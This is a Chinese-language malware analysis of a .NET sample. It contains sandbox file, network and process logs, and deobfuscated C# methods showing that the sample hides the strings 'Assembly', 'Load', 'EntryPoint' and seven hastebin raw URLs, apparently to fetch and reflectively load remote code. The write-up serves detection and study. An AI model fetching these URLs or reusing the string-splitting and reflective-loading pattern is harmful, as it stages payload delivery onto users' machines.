09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,   filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:608,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   NET_connect,    104.18.19.73:443,   protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
09:07:43:641,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   NET_connect,    104.18.18.73:443,   protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll,    offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:721,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:44:861,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\WerFault.exe,   target_pid:8492 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。  ],
09:07:44:861,   WerFault.exe,   8492:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\WerFault.exe,   parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' image_base:0x0000000000A90000 image_size:0x0006F000 , 0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_truncate,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  eof:0x00000000 ,    0x00000000 [操作成功完成。  ],
09:07:45:112,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000020 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll,  base:0x0000000070060000 size:0x0020F000 ,   0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  offset:0x00000000 datalen:0x00001306 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_mkkey,  HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData,    access:0x0002001B , 0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds,   type:0x0000000B datalen:8 data:'61 96 EE 64 00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount,  type:0x0000000B datalen:8 data:'0C 8F 01 00 00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:45:237,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:361,   WerFault.exe,   8492:8024,  4092,   NET_connect,    52.168.117.173:443, protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\ProgramData\Microsoft\Windows\WER\ReportQueue,   filter:'*_*_*_*_*' ,    0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,   access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 ,    0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,   offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    attrib:0x00002080 , 0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    ,   0x00000000 [操作成功完成。  ],
09:07:46:424,   WerFault.exe,   8492:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\WerFault.exe,   parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。  ],
09:07:46:424,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_destroy,   C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' ,   0x00000000 [操作成功完成。  ],

  

关键行为:

1、09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ],
2、09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ],

3、创建和删除了好些临时文件(注意:这些都是 WerFault.exe 为崩溃的样本进程 4092 生成的 WER 崩溃报告临时文件,由 WerFault.exe 自身写入和删除,并非样本主动创建,见上文 "WerFault.exe -u -p 4092" 的日志):

4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ],

 

看下其代码(已经反混淆):

// Token: 0x06000005 RID: 5 RVA: 0x00002052 File Offset: 0x00000252
/// <summary>
/// Returns the constant "1769". The original built it with
/// <c>string.Format("{0}{1}{2}{3}", ...)</c> over four single-character
/// operands, so the complete literal is never stored contiguously in the
/// assembly — a common string-splitting obfuscation.
/// </summary>
/// <returns>The string "1769".</returns>
public static string smethod_2()
{
    // NOTE(review): what 1769 denotes (port, build number, key?) is not
    // visible in this excerpt — confirm against the caller.
    const string value = "1769";
    return value;
}
 
// Token: 0x06000006 RID: 6 RVA: 0x000025F4 File Offset: 0x000007F4
/// <summary>
/// Returns the constant "cmd.exe". The original spelled it out one
/// character at a time through <c>string.Format</c> so the process name
/// does not appear as a single literal in the assembly.
/// </summary>
/// <returns>The string "cmd.exe".</returns>
public static string smethod_3()
{
    // This is consistent with the sandbox log above, where the sample
    // (pid 4092) spawned cmd.exe with "/c timeout 4.769".
    const string value = "cmd.exe";
    return value;
}
 
// Token: 0x06000007 RID: 7 RVA: 0x0000264C File Offset: 0x0000084C
/// <summary>
/// Returns the constant "Assembly", reassembled from eight
/// single-character operands in the original.
/// </summary>
/// <returns>The string "Assembly".</returns>
public static string smethod_4()
{
    // NOTE(review): together with smethod_5 ("Load") and smethod_6
    // ("EntryPoint") these read like member names for reflective
    // loading; whether they are used that way is not visible here —
    // confirm against the caller.
    const string value = "Assembly";
    return value;
}
 
// Token: 0x06000008 RID: 8 RVA: 0x00002084 File Offset: 0x00000284
/// <summary>
/// Returns the constant "Load", reassembled from four single-character
/// operands in the original.
/// </summary>
/// <returns>The string "Load".</returns>
public static string smethod_5()
{
    // NOTE(review): likely paired with smethod_4 ("Assembly") as a
    // member name; the call site is outside this excerpt — confirm.
    const string value = "Load";
    return value;
}
 
// Token: 0x06000009 RID: 9 RVA: 0x000026AC File Offset: 0x000008AC
/// <summary>
/// Returns the constant "EntryPoint", reassembled from ten
/// single-character operands in the original.
/// </summary>
/// <returns>The string "EntryPoint".</returns>
public static string smethod_6()
{
    // NOTE(review): reads like a reflection member name (see smethod_4
    // and smethod_5); how it is used is not visible here — confirm.
    const string value = "EntryPoint";
    return value;
}
 
// Token: 0x0600000A RID: 10 RVA: 0x0000271C File Offset: 0x0000091C
/// <summary>
/// Returns seven "https://hastebin.com/raw/..." URLs joined by the
/// three-character separator "@@@" (263 characters in total). The
/// original produced the same string with a 263-placeholder
/// <c>string.Format</c> over one-character operands, hiding the URLs
/// from simple string scans of the binary.
/// </summary>
/// <returns>
/// The "@@@"-delimited URL list, byte-identical to the original output.
/// </returns>
public static string smethod_7()
{
    // Paste IDs in the order the original emits them. These are
    // indicators worth recording for detection; the page does not show
    // what the sample does with the fetched content.
    string[] pasteUrls =
    {
        "https://hastebin.com/raw/yonozilace",
        "https://hastebin.com/raw/uralapuvuh",
        "https://hastebin.com/raw/epukubaqub",
        "https://hastebin.com/raw/osajoroziw",
        "https://hastebin.com/raw/eqedocefex",
        "https://hastebin.com/raw/ajifuyijez",
        "https://hastebin.com/raw/esurijakad",
    };

    // NOTE(review): smethod_8 returns the same "@@@" token, presumably
    // used by the caller to split this list — confirm.
    return string.Join("@@@", pasteUrls);
}
 
// Token: 0x0600000B RID: 11 RVA: 0x000020B6 File Offset: 0x000002B6
/// <summary>
/// Returns the constant "@@@", built from three "@" operands in the
/// original. It matches the separator between the URLs that
/// smethod_7 returns.
/// </summary>
/// <returns>The string "@@@".</returns>
public static string smethod_8()
{
    // NOTE(review): presumably the split token for smethod_7's list;
    // the caller is not in this excerpt — confirm.
    const string separator = "@@@";
    return separator;
}

  

  • smethod_2: 返回字符串 "1769"
  • smethod_3: 返回字符串 "cmd.exe"
  • smethod_4: 返回字符串 "Assembly"
  • smethod_5: 返回字符串 "Load"
  • smethod_6: 返回字符串 "EntryPoint"
  • smethod_7: 返回一个很长的字符串(共 263 个字符),由 7 个 https://hastebin.com/raw/<粘贴ID> 链接拼接而成,链接之间以 "@@@" 分隔;粘贴ID 依次为 yonozilace、uralapuvuh、epukubaqub、osajoroziw、eqedocefex、ajifuyijez、esurijakad
  • smethod_8: 返回一个字符串 "@@@"